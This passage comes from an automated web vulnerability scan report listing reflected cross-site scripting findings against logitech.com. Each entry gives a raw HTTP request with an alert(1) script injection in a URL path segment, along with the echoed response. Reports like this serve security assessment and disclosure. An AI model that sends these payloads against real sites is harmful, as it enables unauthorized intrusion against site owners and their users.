This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/cmnab32f"><script>alert(1)</script>e426beefa42/navigation/bg-nav-headers/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmnab32f"><script>alert(1)</script>e426beefa42/navigation/bg-nav-headers">
...[SNIP]...

1.139. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a03e7</script><script>alert(1)</script>1de8844da04 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn/navigationa03e7</script><script>alert(1)</script>1de8844da04/bg-nav-headers/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn/navigationa03e7</script><script>alert(1)</script>1de8844da04/bg-nav-headers' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.co
...[SNIP]...

1.140. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7653b"><script>alert(1)</script>7fe941f2f96 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/cmn/navigation7653b"><script>alert(1)</script>7fe941f2f96/bg-nav-headers/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmn/navigation7653b"><script>alert(1)</script>7fe941f2f96/bg-nav-headers">
...[SNIP]...

1.141. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e4ba"><script>alert(1)</script>57abedc4949 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/cmn/navigation/bg-nav-headers5e4ba"><script>alert(1)</script>57abedc4949/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmn/navigation/bg-nav-headers5e4ba"><script>alert(1)</script>57abedc4949">
...[SNIP]...

1.142. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91f8f</script><script>alert(1)</script>e3e3d1142a7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn/navigation/bg-nav-headers91f8f</script><script>alert(1)</script>e3e3d1142a7/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn/navigation/bg-nav-headers91f8f</script><script>alert(1)</script>e3e3d1142a7' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.143. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/en.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/en.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e234d</script><script>alert(1)</script>9bd87dee77b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn/navigation/bg-nav-headers/en.csse234d</script><script>alert(1)</script>9bd87dee77b HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:29 GMT
Connection: keep-alive
Content-Length: 31545


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn/navigation/bg-nav-headers/en.csse234d</script><script>alert(1)</script>9bd87dee77b' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.144. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/en.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/en.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1818c"><script>alert(1)</script>5ef0f52c19a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/cmn/navigation/bg-nav-headers/en.css1818c"><script>alert(1)</script>5ef0f52c19a HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:24 GMT
Connection: keep-alive
Content-Length: 31513


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmn/navigation/bg-nav-headers/en.css1818c"><script>alert(1)</script>5ef0f52c19a">
...[SNIP]...

1.145. http://www.logitech.com/css/v2/cmn/print.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/print.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae4af"><script>alert(1)</script>0c2b3d08c4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/cmn/print.cssae4af"><script>alert(1)</script>0c2b3d08c4 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:24 GMT
Connection: keep-alive
Content-Length: 31393


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmn/print.cssae4af"><script>alert(1)</script>0c2b3d08c4">
...[SNIP]...

1.146. http://www.logitech.com/css/v2/cmn/print.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/print.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5173a</script><script>alert(1)</script>cbab8300107 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn/print.css5173a</script><script>alert(1)</script>cbab8300107 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:31 GMT
Connection: keep-alive
Content-Length: 31430


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn/print.css5173a</script><script>alert(1)</script>cbab8300107' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.147. http://www.logitech.com/css/v2/combined.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/combined.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc770</script><script>alert(1)</script>a866c9d71b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/combined.cssbc770</script><script>alert(1)</script>a866c9d71b HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:29 GMT
Connection: keep-alive
Content-Length: 31420


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/combined.cssbc770</script><script>alert(1)</script>a866c9d71b' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.148. http://www.logitech.com/css/v2/combined.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/combined.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27121"><script>alert(1)</script>ca44c5e3751 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/combined.css27121"><script>alert(1)</script>ca44c5e3751 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:23 GMT
Connection: keep-alive
Content-Length: 31393


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/combined.css27121"><script>alert(1)</script>ca44c5e3751">
...[SNIP]...

1.149. http://www.logitech.com/css/v2/homepage.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/homepage.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd4bb"><script>alert(1)</script>752052b3a53 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/homepage.csscd4bb"><script>alert(1)</script>752052b3a53 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:24 GMT
Connection: keep-alive
Content-Length: 31393


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/homepage.csscd4bb"><script>alert(1)</script>752052b3a53">
...[SNIP]...

1.150. http://www.logitech.com/css/v2/homepage.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/homepage.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81793</script><script>alert(1)</script>cc47607ccab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/homepage.css81793</script><script>alert(1)</script>cc47607ccab HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:31 GMT
Connection: keep-alive
Content-Length: 31425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/homepage.css81793</script><script>alert(1)</script>cc47607ccab' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.151. http://www.logitech.com/css/v2/homepage_print.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/homepage_print.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6caee"><script>alert(1)</script>65dd3ca138f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/homepage_print.css6caee"><script>alert(1)</script>65dd3ca138f HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:43 GMT
Connection: keep-alive
Content-Length: 31423


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/homepage-print.css6caee"><script>alert(1)</script>65dd3ca138f">
...[SNIP]...

1.152. http://www.logitech.com/css/v2/homepage_print.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/homepage_print.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68be9</script><script>alert(1)</script>5272fcf4652 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/homepage_print.css68be9</script><script>alert(1)</script>5272fcf4652 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:50:00 GMT
Connection: keep-alive
Content-Length: 31455


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/homepage-print.css68be9</script><script>alert(1)</script>5272fcf4652' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.153. http://www.logitech.com/css/v2/mobile.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/mobile.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2eeb"><script>alert(1)</script>0b35e17aaf4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/mobile.cssc2eeb"><script>alert(1)</script>0b35e17aaf4 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:30 GMT
Connection: keep-alive
Content-Length: 31383


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/mobile.cssc2eeb"><script>alert(1)</script>0b35e17aaf4">
...[SNIP]...

1.154. http://www.logitech.com/css/v2/mobile.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/mobile.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b39ea</script><script>alert(1)</script>b88e47674bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/mobile.cssb39ea</script><script>alert(1)</script>b88e47674bb HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:37 GMT
Connection: keep-alive
Content-Length: 31415


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
